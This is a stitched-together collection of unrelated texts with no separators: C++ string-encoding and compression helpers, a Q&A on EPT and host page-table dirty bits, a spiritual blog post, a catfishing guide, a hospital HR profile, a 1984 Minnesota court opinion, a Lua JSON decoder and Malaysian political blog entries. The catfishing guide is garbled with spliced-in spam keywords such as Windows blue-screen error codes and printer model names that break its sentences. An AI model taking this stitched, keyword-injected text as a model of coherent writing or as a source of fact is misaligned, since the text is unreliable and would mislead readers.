out) { if (!out) { return false; } core::command_buffer_writer_t wr; const common::string16 s16 = common::ConvertToString16(data); convert_out_t unicoded; common::utils::unicode::encode(s16, true, &unicoded); for (size_t i = 0; i < unicoded.size(); i += 4) { wr << "\\u"; wr << unicoded[i]; wr << unicoded[i + 1]; wr << unicoded[i + 2]; wr << unicoded[i + 3]; } core::command_buffer_t result = wr.str(); if (result.size() % 6 != 0) { return false; } *out = result; return true; } bool string_from_unicode(const convert_in_t& value, convert_out_t* out) { const size_t len = value.size(); if (!out || len % 6 != 0) { return false; } std::string unicode_digits; for (size_t i = 0; i < len; i += 6) { auto c1 = value[i]; auto c2 = value[i + 1]; if (c1 == '\\' && c2 == 'u') { unicode_digits += value[i + 2]; unicode_digits += value[i + 3]; unicode_digits += value[i + 4]; unicode_digits += value[i + 5]; } else { return false; } } common::string16 s16; bool is_ok = common::utils::unicode::decode(unicode_digits, &s16); DCHECK(is_ok) << "Can't un unicoded: " << unicode_digits; *out = common::ConvertToCharBytes(s16); return true; } bool string_from_snappy(const convert_in_t& value, convert_out_t* out) { common::CompressSnappyEDcoder enc; convert_out_t sout; common::Error err = enc.Decode(value, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_snappy(const convert_in_t& data, convert_out_t* out) { common::CompressSnappyEDcoder enc; convert_out_t sout; common::Error err = enc.Encode(data, &sout); if (err) { return false; } *out = sout; return true; } bool string_from_zlib(const convert_in_t& value, convert_out_t* out) { common::CompressZlibEDcoder enc(false, common::CompressZlibEDcoder::ZLIB_DEFLATE); convert_out_t sout; common::Error err = enc.Decode(value, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_zlib(const convert_in_t& data, convert_out_t* out) { common::CompressZlibEDcoder enc(false, common::CompressZlibEDcoder::ZLIB_DEFLATE); common::StringPiece piece_data(data.data(), data.size()); convert_out_t sout; common::Error err = enc.Encode(piece_data, &sout); if (err) { return false; } *out = sout; return true; } bool string_from_gzip(const convert_in_t& value, convert_out_t* out) { common::CompressZlibEDcoder enc(false, common::CompressZlibEDcoder::GZIP_DEFLATE); common::StringPiece piece_data(value.data(), value.size()); convert_out_t sout; common::Error err = enc.Decode(value, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_gzip(const convert_in_t& data, convert_out_t* out) { common::CompressZlibEDcoder enc(false, common::CompressZlibEDcoder::GZIP_DEFLATE); convert_out_t sout; common::Error err = enc.Encode(data, &sout); if (err) { return false; } *out = sout; return true; } bool string_from_lz4(const convert_in_t& value, convert_out_t* out) { common::CompressLZ4EDcoder enc; convert_out_t sout; common::Error err = enc.Decode(value, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_lz4(const convert_in_t& data, convert_out_t* out) { common::CompressLZ4EDcoder enc; convert_out_t sout; common::Error err = enc.Encode(data, &sout); if (err) { return false; } *out = sout; return true; } bool string_from_bzip2(const convert_in_t& value, convert_out_t* out) { common::CompressBZip2EDcoder enc(false); common::StringPiece piece_data(value.data(), value.size()); convert_out_t sout; common::Error err = enc.Decode(piece_data, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_bzip2(const convert_in_t& data, convert_out_t* out) { common::CompressBZip2EDcoder enc(false); common::StringPiece piece_data(data.data(), data.size()); convert_out_t sout; common::Error err = enc.Encode(piece_data, &sout); if (err) { return false; } *out = sout; return true; } bool string_from_base64(const convert_in_t& value, convert_out_t* out) { common::Base64EDcoder enc; convert_out_t sout; common::Error err = enc.Decode(value, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_base64(const convert_in_t& data, convert_out_t* out) { common::Base64EDcoder enc; convert_out_t sout; common::Error err = enc.Encode(data, &sout); if (err) { return false; } *out = sout; return true; } } // namespace gui } // namespace fastonosql
Q: What is the relation between EPT PTE and host PTE entry? I am trying to figure out the relation between the EPT PTEs and host PTEs in the Linux system with virtualization in X86 host. For example, when the hypervisor setup an EPT entry by providing a host memory page, what will happen when the guest writes that page in guest? In above case, the EPT entry is 'dirty', is the host PTE entry to that host page is still dirty or not? I wrote a simple hypervisor for Linux, which supports EPT. I found when the guest writes a page, it is dirty bit is set in EPT entry, but by checking the host PTE entry, I did NOT find the dirty bit set. In the EPT violation handler, I call kmalloc to get a host page for guest. Then I use following code to check the host PTE entry for that page. void pgtable_walk(unsigned long addr) { pgd_t *pgd; pud_t *pud; pmd_t *pmd; pte_t *pte; pte_t cpte; unsigned long page_mask; unsigned int level; phys_addr_t phys_addr; unsigned long offset; pgd = pgd_offset(current->mm, addr); printk(KERN_ALERT "pgd is : %lx\n", (unsigned long)pgd->pgd); printk(KERN_ALERT "pgd index: %lx\n", (unsigned long)pgd_index(addr)); pud = pud_offset(pgd, addr); printk(KERN_ALERT "pud is : %lx\n", (unsigned long)pud->pud); printk(KERN_ALERT "pud index: %lx\n", (unsigned long)pud_index(addr)); pmd = pmd_offset(pud, addr); printk(KERN_ALERT "pmd is : %lx\n", (unsigned long)pmd->pmd); printk(KERN_ALERT "pmd index: %lx\n", (unsigned long)pmd_index(addr)); if(!pmd_large(*pmd)) { pte = pte_offset_kernel(pmd, addr); printk(KERN_ALERT "pte is : %lx\n", (unsigned long)pte->pte); printk(KERN_ALERT "pte index: %lx\n", (unsigned long)pte_index(addr)); level = 2; } else { pte = (pte_t *)pmd; level = 1; } page_mask = page_level_mask(level); phys_addr = pte_pfn(*pte) << PAGE_SHIFT; offset = addr & ~page_mask; printk("Final Phys Addr: %lx, dirty=%x, pte=%lx\n", (unsigned long)(phys_addr | offset), pte_dirty(*pte), pte_val(*pte)); } If so, how does Linux knows which page is dirty or not? A: The processor can only set the dirty bit in the PTEs that are used to translate the virtual address when the write is performed. So when a guest writes to a page, the processor sets the dirty bits in the guest PTE and in the EPT.* At the time a write happens in a guest, the processor doesn’t have a pointer to the host page tables, nor does it know whether the page is even mapped in any host page tables. So if software in the host wants to find out if the page is dirty, it must look at the EPT. * The EPT dirty bit is set only if the optional EPT A/D feature is available and is enabled by setting bit 6 in the EPTP field in the VMCS. (See section 28.2.5 of the Intel SDM.)
Month: May 2013 We all want acceptance from those around us. Especially from those we love. While on a walk the other day I asked for guidance on how to let go of the icky feeling I had that I was not being accepted. This is what I heard. The italics are the thoughts I had that seemed to propel this voice to tell me more. Help me let go of the need for acceptance. Accept the person for how they accept you. And then…? And then… There is nothing more to do. The person already accepts you into their life in the way they know how. It is your desire to be accepted the way you see yourself and not the way that they see you that causes pain. When you have accepted how this person accepts you, you will no longer care what he/she thinks of you but instead be able to be fully yourself in their space without trying to fit what he/she needs. By not caring about what they think, but rather caring enough to accept them as they are, you become the example they need. By being yourself and not placing judgement on the other for how they judge you, you break the cycle and allow room for each individual to be who they are without fear. When they have lost fear of who they are, they are less likely to fear who you are. This is what is meant by liberation. You become the light. Your light repels the darkness so that you are able to keep shining. A flame might bend in the wind to allow it to move past. You may bend to others, but a flame that bends too far will go out. Bend around the wind. Better yet, catch the wind. Set fire to the world. This is the way you become the light of the world. Set fire to it and bring along everything in you path. Do it not in the NAME of the Lord but rather with his breath. His breath shall be the wind that spreads the fire with which you were born. The one the world is trying to extinguish. This is the Holy Spirit, which is represented by wind and fire. You must fan the flame with the breath of the Spirit and nothing else. Pray that yor flame be cuaght up in the universal fire. Pray that you have the passion and the momentum to take all you meet higher into the flames. Then keep praying. Like this: In lui of a playlist I created, check out Songza. This is a my new favorite website (and smartphone app!) for streaming music. The site is full of ready made playlists by DJs. Although it may seem like all the other streaming sites, Songza differentiates itself by being free and without commercials. It also allows you to filter by mood, genre, decade and activity. One downside is you cannot request a song or artist that you like, however, the descriptions of the playlists are spot on and you get what they say you get. There are mixes for working, sleeping, partying, even yoga.
$georgia: Georgia, Cambria, "Times New Roman", Times, serif; $helvetica: "Helvetica Neue", Helvetica, Arial, sans-serif; $lucida-grande: "Lucida Grande", Tahoma, Verdana, Arial, sans-serif; $monospace: "Bitstream Vera Sans Mono", Consolas, Courier, monospace; $verdana: Verdana, Geneva, sans-serif;
Visual stimulation reduces EEG activity in man. Data are presented which show that background electric activity of the human brain is reduced by visual stimulation. Occipital EEG amplitude decreases 5-15% for all frequencies analyzed (0.2-40 Hz) upon pattern stimulation. The reduction is stimulus-specific, i.e. is the strongest for stimuli that activate a large number of visual cortical neurons.
And you, in turn are floating quietly above him - almost motionless in your boat; you have the finest catfishing gear that money can buy; you know how to attract them because you’ve done this many times – but this time, it’s different. This time, you’re going after the big one. He’s down there and you’re up here. How are you going to coax him to approach your catfish lures? What will tempt him beyond his catfish senses? What are you going to use which will entice him and persuade him to explode out and take your catfish lures? If you’ve chosen an overcast day, following a rainstorm or spring thaw, you’ve chosen a good day. The water level will have risen and the flooding around newly submerged vegetation attracts all kinds of aquatic life 4fthursday and this means that catfish are out there in hordes, gorging themselves. And that monster cat may be among them. And he’s the one you want – the smaller ones can stay there, gorge and grow. Let’s take a moment and examine the different kinds of catfish lures used by kernel_data_inpage_error 0x0000007a Blue Screen anglers to get the big ones. The type Drop Down Box in a Microsoft Excel Cell. of bait you use will decide which kind of catfish you’ll attract. So, we need to make sure we’re using the best catfish lures before going out. Many anglers believe that live bait is more effective than others – bluegill or shad, which you can catch with a casting net the day before and keep overnight. Those who know these things tell Brother HL 5170DN - Makes for A Great Printer us that the big, mature flatheads and blue catfish are more likely to be tempted by live bait – place your hook either through the lower jaw up to the nostrils or in behind the dorsal fin. Another place is to hook it firmly, right at the end of the tail – a big live ten to twelve inch baitfish will drive that big cat crazy – and he will be yours. You’re an experienced angler – you already know that you need carefully selected gear when you use live catfish lures. You need a medium-heavy to heavy action rod rigged with a minimum twenty-pound test along with spider line with a minimum fifty-pound test line. He deserves to Enrich Your Experience With Quality Duct Work be honored with respect - and the best gear you can Stop 0x0000007 get. You’ll also need twenty-pound test leaders and numbers two to six circle hooks for him. Make sure you attach a sinker at the end of Stop 0x0000007 the fishing line and use a top-quality swivel. Goliath may take it into his head to roll once you’ve got him and the kernel Data Inpage Error Windows 10 cheaper brass swivels may not be able to handle him. If you prefer to use the old, traditional “tried, tested and true” catfish lures then we need to make sure that it is smelly. Catfish love stinky smells and they’re very effective. Consider using crawfish – catfish love them and it’s one of the best catfish lures available. Remove the shell and put the crawfish right on the hook – catfishes love the tails. You can get crawfish from bait or tackle stores or you can catch your own if it’s spring or fall; use a crawdad trap No crawfish – no problem. Use shrimp because to a catfish they look and taste very similar. You can use whole shrimp as your catfish lures or shell them and cut them in half. Shrimp are great as catfish lures because they stay on your hooks, even in a stronger current or when you’re casting or drift fishing. The findings of a series of hearings, and the committee†™s reflection on them, have since been compiled into a report released today alongside the committee†™s recommendation that regulation is needed. ...
Menu Why Debbie Palmer Came Out of Retirement “I’m not interested in coming to work at Fairfield Medical Center,” Debbie Palmer told a colleague who was trying to persuade her back in 2008. “I’ve been retired six months. I’m learning bridge. I’m playing golf.” But the colleague persisted, and Palmer offered to come and do a one-time analysis for Fairfield—a 222-bed nonprofit hospital in Lancaster, Ohio. Fairfield’s problem, she was told, was the less-than-successful decentralization of the training and education department. But as a short-term opportunity became one accepted job offer after another, and as months at Fairfield turned into years, she helped create a work environment that is not only more efficient than ever, but is also infinitely more satisfying. She currently serves as Fairfield’s chief human resources officer and corporate compliance officer. “I’m no expert,” Palmer says, discussing basic process improvement skills. “But I do know that really understanding what your services are, what you’re trying to deliver, what your customer wants from you—they’re all important. And then you have to deliver it in an effective and efficient manner.” Palmer kept all that in mind as she began her initial assessment, which involved Fairfield’s education and training department. She quickly perceived an unmistakably negative vibe: We’re terribly busy all the time. We’re underappreciated. Nobody cares about us. She responded by trying to verbally identify what was keeping them so busy and so unhappy. That proved easier said than done, especially without any measurable data. So, she got rudimentary about it, produced slips of paper, and required each employee to track their daily activities in fifteen-minute increments. Debbie Palmer’s Three Aspects of a Positive Work Culture 1) Understand who you have working for you, and get them in the most suitable job for their skills and strengths. 2) Understand what managers are looking for, and develop personnel accordingly, including promoting from within, prepping for leadership, and addressing performance issues. 3) Empower people to do their jobs, evaluating and supporting without micromanaging them. “We did that time study for a month,” Palmer recalls. “There was a lot of moaning, lots of groaning, lots of, ‘Oh my God, I can’t believe you’re making me write down what I’m doing every fifteen minutes.’ And I told them, ‘This is about understanding how you spend your time because most of you cannot tell me.’” The standout discovery from the study was that a whopping 30 percent of each educational staff member’s time was spent helping people either register, reregister, or cancel registration for classes. “One of the first things I said was, ‘I want to get these people on the phone so they can tell me why we can’t do self-registration,” Palmer says. “One of my educators, an IT educator who really functioned more like a help desk, told me there was no way, that it just wouldn’t work. I said, ‘Let’s ask the question anyway.’” Ten days later, self-registration was working, the help-desk educator was questioning if she could do the job being asked of her, and Palmer was meeting one-on-one with the remaining four educational staff at Fairfield, leading each conversation with a question: “Are you doing the job here you really want to be doing?” It turned out that none of them were. One nurse was teaching computer classes when what she really wanted to do—and was capable of doing—was run Fairfield’s new simulation lab. A second person was primarily doing clerical work while she longed to be an actual educator. A third was in dire need of streamlining her efforts teaching CPR, ACLS, and orientation. The fourth was struggling with her responsibilities in delivering nursing orientation. In short order, Palmer addressed each of their issues: For nurse number one, she helped the computer classes become more self-contained so she could move over to the simulation lab as she desired. For the aspiring educator, she helped the employee take full advantage of Fairfield’s tuition reimbursement program, and the employee began to learn to coordinate Fairfield’s new student orientation program. And the life of nurse number three got a lot more productive when Palmer initiated some long-overdue discussions with nursing supervisors. And nurse number four worked hard to improve her nursing orientation work. Then, the overall benefits of these changes kicked in. “The end result of that was that we were able to start offering a variety of different programming because the team was spending 30 percent of their time doing all the registration,” Palmer says. “We got people out of mundane tasks, got them the training they needed, and when necessary, put the staff in the right roles.” Fairfield’s regimented HR department underwent a similar transformation when it began reporting to Palmer. She recalls one employee, a recruiter at the time, who yearned for more of a leadership role and now has one as an HR manager. And another young woman initially spent all her time doing data entry when she really wanted to help Fairfield’s staff as a benefits coordinator—which she does today. These efforts toward efficiency and effectiveness were met, at first, with plenty of resistance. “I remember getting a lot of pushback in the form of managers saying I was too aggressive,” she says. “They’d say, ‘Things are fine the way they are. Why are you trying to shake things up?’” She even encountered resistance with the employee satisfaction surveys, which had been executed in-house until Palmer determined it would be more cost-efficient to outsource them. But with the results Fairfield receives nowadays—rankings of fours and fives instead of twos and threes on a scale of 1–5—she knows a significant corner has been turned. And she’s more than a little excited to be a part of it. “There are many cool things happening now in our organization,” Palmer says. “And it all starts when you get the right people in the right roles and give them the freedom to do their jobs.”
// Distributed under the terms of the MIT license // Test case submitted to project by https://github.com/practicalswift (practicalswift) // Test case found by fuzzing if{var:c class c func c class a{{ }protocol}}
359 N.W.2d 612 (1984) STATE of Minnesota, Respondent, v. Martin J. SPECHT, Appellant. No. C6-83-874. Supreme Court of Minnesota. December 21, 1984. C. Paul Jones, Public Defender, Mark Anderson, Asst. Public Defender, Minneapolis, for appellant. Hubert H. Humphrey, III, St. Paul, Alan Mitchell, St. Louis County Atty., Duluth, for respondent. COYNE, Justice. Defendant was charged with making or aiding and abetting the making of a terroristic threat, Minn.Stat. §§ 609.05 and 609.713 (1982), for his role in an August 1982 racial incident in a Duluth neighborhood that culminated in the burning of a sheetcovered wooden cross. Defendant's first *613 trial ended in a hung jury, the second in a conviction. The trial court sentenced defendant to 1 year and 1 day in prison but stayed execution of the sentence and placed defendant on probation for 3 years, the first 6 months to be served in jail. On this appeal from judgment of conviction, defendant contends that he should be given a new trial because (1) the trial court erred in refusing to let defense counsel demonstrate to the jury that a photographic display containing defendant's picture was suggestive and that therefore the identification of defendant by an eyewitness who viewed the display was unreliable, and (2) the trial court erred in refusing to submit the lesser offenses of disorderly conduct and unlawful assembly, Minn.Stat. §§ 609.72, subd. 1(1, 3) and 609.705 (1982). We affirm. 1. We agree with defendant that the trial court should have admitted the photographic display. The fact that the display was not so suggestive as to create a very substantial likelihood of irreparable misidentification, Manson v. Brathwaite, 432 U.S. 98, 97 S.Ct. 2243, 53 L.Ed.2d 140 (1977), did not bar defendant from attacking the eyewitness' identification of defendant by showing the jury that the display from which the witness first identified defendant was suggestive. Watkins v. Sowders, 449 U.S. 341, 347, 101 S.Ct. 654, 658, 66 L.Ed.2d 549 (1981); Manson v. Brathwaite, 432 U.S. 98, 114, n. 14, 97 S.Ct. 2243, 2252 n. 14, 53 L.Ed.2d 140 (1977); Minn.R. Evid. 104(e). However, any error in refusing to admit the evidence was nonprejudicial for a number of reasons, in particular that a number of other eyewitnesses, including those who were with defendant before the incident, positively identified defendant as an active participant in the criminal conduct. 2. Defendant's other contention is that the trial court erred in refusing to submit lesser offenses to the jury. The offenses — disorderly conduct and unlawful assembly — clearly are lesser offenses but are not necessarily included offenses under the approach we have taken in applying Minn.Stat. § 609.04 (1982). State v. Frost, 342 N.W.2d 317 (Minn.1983); State v. Whisonant, 331 N.W.2d 766 (Minn.1983). As stated in Frost, "[O]ne must look at the statutory definitions rather than the facts in the particular case to determine whether the lesser offense is necessarily included." 342 N.W.2d at 323. Since one can commit the charged offenses without committing either of the lesser offenses, the lesser offenses are not necessarily included within the charged offense. Accordingly, the trial court properly refused to submit the lesser offenses. Affirmed.
Archives Meta CBC’s English language Radio’s “C’est la vie” is one of the networks longest running and more successful radio programs. It runs once a week on CBC Radio One, for 30 minutes each time (Sundays 6:30 p.m.,Tuesdays 11:30 a.m., 3:30 p.m. NT). If you wish to learn more about life in French-speaking Canada (strong concentration on Québec, but with focus on other areas of Canada as well), then this program is for you. C’est la vie’s target audience is Anglophone Canadians, and can provide you with much in the way of context, and sub-context, to help understand important nuances and values in French speaking Canada. I have to admit that the program does an excellent job of remaining politically neutral, and you will never feel there is any political message or bias (a very difficult task to pull off considering the variety of subjects discussed). The completely bilingual host (you wouldn’t know if he is Francophone or Anglophone), Bernard St-Laurent, is the political editor for CBC radio Montréal. He’s often sought for political perspectives, analysis, and commentaries on numerous other programs and networks (he is one of a rare handful of reporters anywhere in Canada who lives across, and understands issues across both Francophone or Anglophone linguistic lines. Chantal Hébert may be one of the only other such people who I readily can think of). Because of St-Laurent’s unique perspective, he asks the show’s guests questions that Anglophones would not have thought to have asked, and he delves into issues which gives Anglophones a completely new perspective of their own country and cultural heritage. I cannot think of any other program like this one, anywhere in Canada (Grégory Charles’ former CBC/Radio-Canada television show Culture shoc is the only other one that comes to mind). In my teen years, during the constitutional rounds, and referendum years, I remember thinking that a wide-ranging program such as this was desperately needed in Anglophone Canada to help bridge the Two Solitudes. I can actually remember where I was in 1998 when I heard an advertisement on CBC radio that they would be launching the new program C’est la vie. I made a point of catching the launch of their first episode, and I’ve been a fan of the program ever since (even when I moved abroad, I made a point of downloading their podcasts). It helps to fill in numerous missing gaps, and it gives a good number of small “uh huh” moments – which over time, weaves a bigger picture of issues and lifestyle. The last 5 minutes of the program provides a language capsule. Each week, the show’s “word lady”, Johanne, teaches the audience a new word in French, and explains its many uses, both formally and colloquially. We’re fortunate that this is one of the best archived radio programs on CBC’s website. You can listen to programs going back years, and past programs are available as podcasts (perfect lengths for daily commutes). I really hope this program continues to evolve into something bigger. Time will tell what they do with it. But with the program having reached millions and millions of Anglophones over the last 15 years, I don’t think it will be going off air any time soon. The link for the show’s official website, including archived programs, is HERE iTunes also has a word-of-the-week and program podcast library. Hats off to all the crew at C’est la vie !! ADDENDUM: 2015-07-08 The show’s long-running host, Bernard St-Laurent, retired last week. The show will be back this fall with a new host (and the same producer, Alison Cook, and same word lady, Joanne, who both contribute so much to making the show a success).
Mothers and newborn babies in Western Highlands Province will greatly benefit from a new maternal and newborn care program launched in Mt Hagen recently. Initiated by UNICEF, the program focuses on preventing and managing bleeding after delivery, a common cause of death in mothers and neonatal hypothermia (low body temperature) in newborn babies. The program – “Saving Lives, Spreading Smiles” – will ensure up to 30,000-plus babies born in the province over the next three years receive a comprehensive package of care to ensure they survive. The package of care involves the prevention and management of bleeding after delivery through the use of a Non-Pneumatic Anti-Shock Garment (NASG) for mothers while a hypothermia alert device known locally as the Bebi Kol Kilok will be used to prevent and manage neonatal hypothermia for the babies. Western Highlands is the first province in the country to have the program launched with funding support of K2 million from UNICEF Australia. The funding assistance will also cover the cost of setting up a world standard neonatal intensive care unit in the province. The K2 million funding assistance by UNICEF has been supported by the Australian Government with another K9 million to expand the program to the rest of the country. The Mt Hagen project was officially launched on 19th September 2018 by UNICEF Country Representative, Mr David McLoughlin and the Western Highlands Deputy Governor, Mr Michael Mai. It was witnessed by officials from the World Health Organisation, National Department of Health, UNICEF, Department of Western Highlands and the Provincial Health Authority. Mr McLoughlin said the new package of care promoted simple cost-effective life-saving practices that were so crucial for mothers and newborns to survive. “We thank the Australian Government and UNICEF Australia for their support which will help us to implement this program throughout the country”, he said. Deputy Chairman of the WHPHA Board, Mr Michael Pundia said the staff of the Provincial Health Authority had been working hard to reduce maternal and child morbidity and mortality and paediatric case mortality rates were now nearly a third lower than the national average. “This shows how the Provincial Health Authority Reform can have a major impact on the health of our people. It is also a reflection of the commitment and dedication of all of our staff including our hardworking understaffed doctors and nurses. “This innovative program being launched today will see a further improvement in those key indicators and more mothers and babies will survive”, Mr Pundia said. Western Highlands Deputy Governor, Michael Mai said his province was honoured and privileged to receive such support from international partners such as UNICEF and the Australian Department of Foreign Affairs and Trade. “This is a blessing for Western Highlands, especially for our mothers and babies. I thank the leadership of the Western Highlands Provincial Health Authority for displaying strong commitment in leadership which has attracted the support of the international partners. “Everything falls down to leadership and WHPHA has good and strong leadership that has attracted donors to invest in the health of our people and I thank you all”, he said. Mr Mai said through good leadership, the WHPHA had recently opened the refurbished Emergency Department at Mt Hagen Hospital and later launched the polio vaccination exercise in the province where 92 percent of children under 5 years had been vaccinated. He said these initiatives together with the launching of the “Saving Lives, Spreading Smiles” project had reflected strong leadership of the organisation and assured the international partners that his government would work closely with all agencies to ensure all these programs were implemented successfully. UNICEF Country Representative, David McLoughlin addressing the crowd. Dance group performing. Officials seated for the official launch. Three mothers trying out the Bebi Kol Kilok on their babies, watched by officials.
--[[ Licensed according to the included 'LICENSE' document Author: Thomas Harning Jr <harningt@gmail.com> ]] local lpeg = require("lpeg") local util = require("json.decode.util") local jsonutil = require("json.util") local table_maxn = require("table").maxn local unpack = unpack module("json.decode.array") -- Utility function to help manage slighly sparse arrays local function processArray(array) local max_n = table_maxn(array) -- Only populate 'n' if it is necessary if #array ~= max_n then array.n = max_n end if jsonutil.InitArray then array = jsonutil.InitArray(array) or array end return array end local defaultOptions = { trailingComma = true } default = nil -- Let the buildCapture optimization take place strict = { trailingComma = false } local function buildCapture(options, global_options, state) local ignored = global_options.ignored -- arrayItem == element local arrayItem = lpeg.V(util.types.VALUE) -- If match-time capture supported, use it to remove stack limit for JSON if lpeg.Cmt then arrayItem = lpeg.Cmt(lpeg.Cp(), function(str, i) -- Decode one value then return local END_MARKER = {} local pattern = -- Found empty segment #lpeg.P(']' * lpeg.Cc(END_MARKER) * lpeg.Cp()) -- Found a value + captured, check for required , or ] + capture next pos + state.VALUE_MATCH * #(lpeg.P(',') + lpeg.P(']')) * lpeg.Cp() local capture, i = pattern:match(str, i) if END_MARKER == capture then return i elseif (i == nil and capture == nil) then return false else return i, capture end end) end local arrayElements = lpeg.Ct(arrayItem * (ignored * lpeg.P(',') * ignored * arrayItem)^0 + 0) / processArray options = options and jsonutil.merge({}, defaultOptions, options) or defaultOptions local capture = lpeg.P("[") capture = capture * ignored * arrayElements * ignored if options.trailingComma then capture = capture * (lpeg.P(",") + 0) * ignored end capture = capture * lpeg.P("]") return capture end function register_types() util.register_type("ARRAY") end function load_types(options, global_options, grammar, state) local capture = buildCapture(options, global_options, state) local array_id = util.types.ARRAY grammar[array_id] = capture util.append_grammar_item(grammar, "VALUE", lpeg.V(array_id)) end
Pages Saturday, September 29, 2007 I actually wrote this article a few months back for the purposes of submission to the New Straits Times (NST). Unfortunately, and bruising my personal ego in the process, it was rejected. ;) The article sort of sat around idle for a while until I submitted it to Aliran Monthly. Well, it's just been published, and I thought I'd put out my article here in 2 parts. (A little plug for Aliran - It's a Reform Movement dedicated to Justice, Freedom & Solidarity and listed on the roster of the Economic and Social Council of the United Nations. Founded in 1977, Aliran welcomes all Malaysian above 21 to be members. Visit their website for more information or subscribe for a copy of Aliran Monthly today ;).) Malaysia is a country blessed with abundant natural resources. In particular, we are thankful that the country is rich in oil and gas, which created Malaysia's sole representative in the Fortune 500, Petroliam Nasional Berhad (Petronas). In the most recent financial year ending March 2007, Petronas achieved record profits before tax of RM76.3 billion thanks to record high crude oil prices which increased from under US$25 per barrel to above US$70 all within 4 years. Of greatest importance, was the fact that Petronas contributed RM53.7 billion to our national coffers in taxes, royalties, dividends and export duties last year. Contribution from Petronas and other oil and gas companies operating in Malaysia was budgeted to make up some 46.8% of the government revenue for 2007. This represents a steep increase from approximately 30% in 2006 and 25% in 2004. These statistics marks Malaysia's heavy reliance on oil and gas industry today. Malaysia's abundance of oil & gas resources is akin striking lottery. It is a once-off affair, and at some point of time, our reserves will run dry. According to Oil & Gas Journal, Malaysia held proven oil reserves of 3.0 billion barrels as of January 2007, down from a peak of 4.6 billion barrels in 1996. These reserves will last us for only another 20 years or so. What's worse, Malaysia is expected to become a net oil importer by 2010 assuming a conservative growth of 4% in petroleum products consumption. Our trade current account surplus has also been boosted significantly by oil and gas related products which constitutes more than 11% of our exports. The frightful acceleration of dependence on our limited oil and gas resources places the country's economy at great risks. Malaysia must not fall into the trap of what economists call the “resource curse”, that is countries devoid of natural resources fare better than countries better endowed. Countries such as Hong Kong, Singapore and Switzerland contrasted against the oil-rich but poorly developed Middle East countries immediately comes to mind. This appears to be closely related to the phenomenon known as the Dutch disease. The Netherlands in the 1960s, after its discovery and depletion of oil and gas in the North Sea, was plagued with unemployment and a unproductive manufacturing sector due to the negative side effects of such a discovery. What is perhaps most worrying for Malaysia, with the reliance on natural resource overshadowing the other productive sectors of the economy, is the resulting “rent-seeking economy” where influential parties within and without the government focus their efforts in securing a a larger share of the economic pie, instead of creating a bigger pie. Oil and gas for example, is of wealth, which does not in itself create employment. The right to manage this wealth however, lies in the hands of the government of the day. This concentration of distributive control over wealth leads to vastly disproportionate amount of resources spent on lobbying and rent-seeking activities which will in turn reduce efforts in raising our other productive sectors as well as human capital. Associate Professors, Ricky Lam and Leonard Wantchekon of Northwestern and New York University respectively labelled this phenomenon the political Dutch disease. In Malaysia, we are certainly seeing the impact of the political Dutch disease. With rampant rent-seeking activities as well as political patronage, large amounts of economic and financial leakages are beginning to surface. Earlier this year, the Second Finance Minister, Tan Sri Nor Mohamed Yakcop has disclosed in Parliament that the recent bailout of 7 privatised projects has cost the Government RM11.0 billion, including the Putra and STAR LRT transport systems and Malaysia Airlines System costing RM7.7 billion and RM2.8 billion respectively. This amount works out to approximately 69.5% of the original cost of these projects. Not included in the above lists are projects such as the MATRADE building and the Middle-Ring Road II which had repair bills of RM120 million and RM70 million over their original cost of RM167 million and RM120 million respectively. More recently, we have seen how just completed government projects such as the Immigration office in Putrajaya, the mega-court complex in Jalan Duta as well as the renovated Parliament house require desperate resuscitation efforts. Whilst the bail out packages and the repair bills have worked out to huge sums of money, its impact on the economy appears to be minimal at first glance. The country's gross domestic product (GDP) continues to grow at a healthy rate of around 5% per annum for the past few years. However, the GDP growth rate masks the fact that we have been increasingly reliant on our God-given natural resources for revenue, which has in turn cushioned the impact of dissipation of wealth caused by the impact of non-value-adding rent-seeking activities. Friday, September 28, 2007 Last week in my regular column in Oriental Daily, I wrote on the fact that in the latest Budget 2008 announced by the Datuk Seri Abdullah was extremely disappointing for it neglected the largest productive sectors of the economy, both the manufacturing sector as well as the small medium enterprises (SMEs). In the entire 44-page budget, there was only 1 incentive for the SMEs, that is taxes for new start ups can be paid in a more flexible fashion within the first 2 years. The manufacturing sector, despite contributing to 30% of our economy, was not mentioned at all except when it was mentioned that it is only expected to grow 3.8% in 2008 from the estimated weak 3.1% in 2007. Both the SMEs and the manufacturing sectors are facing huge challenges in terms of globalisation and competition. The fact that the Government made no additional incentives or policies to enhance the competitiveness of our local companies relative to our neighbours and competitors is just "shocking". Clearly, there are some misplaced priorities in the Government's economy policies despite the record-breaking RM176.9 billion budget expenditure. Thursday, September 27, 2007 Heh, heh, Chinese current affairs magazine, 'Special Weekly', did a cheeky take pn some of the "young guns" expecting to contest in the coming general elections. You'd notice that the DAP kids are all in Optimus Prime gear, while Victor Gu's in the Bumble Bee outfit. I wonder who's going to don the Megatron suit... ;) Last month, when [the Government] advertised for three electronics technical assistants and one electronics engineer, it was swamped with 9,216 resumes for the first job and 3,705 for the second. The public sector, it seems, is the most popular employer these days. And the reason? It is the result of the government's drive to produce more graduates. One in every five Malaysian workers now has a degree or diploma, compared with one in seven five years ago. Many new Malay graduates flock to the government sector because, as [economist] Datuk Dr Zainal [Aznam Yusof] said, they find it harder than others to find jobs in the private sector. The article also quote a few other Malay economists on the jobs and employment situation in Malaysia. I'd certainly like to hear whether the UMNO Deputy Youth Chief will similarly think that what they are saying represents an "insult" to Malays. The Government must face up to the problems faced by the bloated civil service as well as the increasing rate of unemployment among local graduates. To a large extent the very cause of the current problems faced, particularly by the bumiputera community, is ironically the New Economic Policy (NEP) itself, which was designed to assist them. Until the NEP is discarded and a more progressive policy implemented, the problems facing the community are only expected worsen in the coming years, and not as intended, improve. Tuesday, September 25, 2007 I won't write much. The quote from the Minister in Prime Minister's Department is shocking enough on its own. With reference to the boiling crisis of credibility facing our Malaysian judiciary with the exposure of the "Lingam tapes", Datuk Seri Nazri Aziz has this to say, as reported in Malaysiakini. De facto law minister Mohd Nazri Abdul Aziz said he issued a denial on behalf of the chief justice in relation to the explosive ‘Lingam tape’ revelations because “I am his minister”. “I am his minister. I am the minister in charge of legal affairs. He is clever enough to know that the reporters will ask me for a response.” Clearly, the Federal Constitution is only a document for show in the current administration led by Datuk Seri Abdullah Ahmad Badawi. Having desecrated the constitution by declaring Malaysia as an Islamic state, the Government now does it again by not only removing the independence of the judiciary, 